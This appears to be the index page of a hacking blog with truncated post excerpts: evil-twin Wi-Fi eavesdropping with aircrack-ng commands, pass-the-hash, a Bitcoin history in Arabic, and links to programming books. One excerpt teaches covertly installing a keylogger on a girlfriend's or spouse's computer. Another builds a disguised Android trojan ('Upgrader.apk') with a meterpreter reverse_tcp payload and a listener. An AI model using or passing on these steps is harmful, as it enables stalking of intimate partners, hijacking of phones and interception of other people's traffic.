Skip to main content

Posts

what is the best programming language

what is the best programming language   or what is the  programming language that you should  learn  it first ومن يريد جميع الكتب المذكوره بالصوره فهذه هي روابط الكتب 1--python https://www.up-4ever.com/55xukx3vfkgb 2--java https://www.up-4ever.com/yjquk2d7tnrh 3--java script https://www.up-4ever.com/o10zu39zc4fy 4--ruby https://www.up-4ever.com/ogumny86ju6s 5--c# https://www.up-4ever.com/7ghg4guzb06q 6--c++ https://www.up-4ever.com/7f2mbsu6td73 7--php https://www.up-4ever.com/m8ec1mm7z74w 8--c https://www.up-4ever.com/xw8zcus5wxqd 9--c{opjective} https://www.up-4ever.com/8ee2xwstdnlz

Creating an Evil Twin Wireless Access Point to Eavesdrop on Data

Creating an Evil Twin Wireless Access Point to Eavesdrop on Data Welcome back, my greenhorn hackers! Now that we're familiar with the technologies, terminology, and the aircrack-ng suite, we can finally start hacking Wi-Fi. Our first task will be to creating an evil twin access point . Many new hackers are anxious to crack Wi-Fi passwords to gain some free bandwidth (don't worry, we'll get to that), but there are so many other Wi-Fi hacks that are far more powerful and put so much more at risk than a bit of bandwidth. What's an Evil Twin AP? The evil twin AP is an access point that looks and acts just like a legitimate AP and entices the end-user to connect to our access point. Our aircrack-ng suite has a tool, airbase-ng , that can be used to convert our wireless adapter into an access point. This is a powerful client-side hack that will enable us to see all

passing the hash

passing the hash  expert metasploit penetration testing course 

Set Up an Eviltwin

Set Up an Eviltwin When I tried to set up an eviltwin for a MitM-constelation in kali 2.0, I couldn't provide internet to the victim. The origin was the brctl bridging. I have read many tutorials but all of them where explained in backtrack and older versions of kali. So i was searching for a solution without using brctl and this solution will be explained now. This will just work on unencrypted wireless-environments. Step 1 Sniff the Air First victims AP information must be observerd set wifi-adpater in monitor mode there are two options to do so, I prefer this commands "ifconfig wlan0 down" "iwconfig wlan0 mode monitor" "ifconfig wlan0 up" this is the second one "airmon-ng start wlan0" if you have trouble with this type "airmon-ng check" and maybe kill some of the PIDS, but be aware

How to Remotely Install a Keylogger onto Your Girlfriend's Computer

How to Remotely Install a Keylogger onto Your Girlfriend's Computer Welcome back, my greenhorn hackers! Several of you have you have emailed me asking whether it's possible to install a keylogger on a victim's computer using Metasploit. The answer is a resounding "YES"! So, by popular request, in this guide I'll show you how to install a keylogger on your girlfriend's, boyfriend's, wife's, or husband's computer. For those of you wondering what a keylogger is, the simple answer is that it's a piece of software or hardware that captures every keystroke and saves them for retrieval by you, the attacker. These types of devices have long been used by hackers to capture logins, passwords, social security numbers, etc. Here we will use it to capture the keystrokes of a cheating girlfriend. S

Hack Android Using Kali (Remotely)

Hack Android Using Kali (Remotely) Hello Hackers! Welcome to arab black hat blog: This is a tutorial explaining how to hack android phones with Kali. I can't see any tutorials explaining this Hack/Exploit, so, I made one. ( Still ,you may already know about this ) Step 1: Fire-Up Kali: Open a terminal, and make a Trojan .apk You can do this by typing : msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 R > /root/Upgrader.apk (replace LHOST with your own IP) You can also hack android on WAN i.e. through Interet by using your Public/External IP in the LHOST and by port forwarding (ask me about port forwarding if you have problems in the comment section) Step 2: Open Another Terminal: Open another terminal until the file is being produced. Load metasploit console, by typing : msfconsole Step 3: Set-Up a Listener: After it

البيتكوين .. تاريخه و حاضره و مستقبله

البيتكوين .. تاريخه و حاضره و مستقبله ــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ * عام 2007 مبرمج يابانى إسمه # ساتوشى_ناكاموتو قام بالعمل ع لى ورقة بحثية تخيل فيها نظام مالى عالمى جديد قائم على سياسة الإنتقال الحر لرؤوس الأموال بعيداً عن سلطة البنوك المركزية للدول .. لم يكن ساتوشى هو أول من فكر بهذا الشأن لكن فكرته هى من وجدت الحاضنة الشعبية لها .. هو إخترع شيئاً قد يغير المفاهيم المالية العالمية مستقبلاً .. ساتوشى إخترع # بيتكوين - # Bitcoin * ساتوشى أراد إختراع نقود لكن بدون مواصفات النقود التقليدية فهى نقود غير ملموسة و لا توجد بنوك مركزية تحكم إصدارها و لا تحظى بالقبول العام حتى إن وقت إصدارها لم يكن لها أى قبول نهائياً بين الناس فما الذى سيغريهم لإمتلاكها ؟ .. كيف سيقنعهم بإقتناء تلك العملة و ماذا سيفعلوا بها بعد إقتنائها ؟ ساتوشى لعب على نقطة مهمة ترفع من سعر أى سلعة فى العالم .. # الندرة * صمم ساتوشى النظام الإليكترونى لبيتكوين بأن يسمح له بإنتاج 21 مليون وحدة فقط و بعدها سيتم إيقاف الإنتاج أو إيقاف التعدين كما هو متعارف عليه و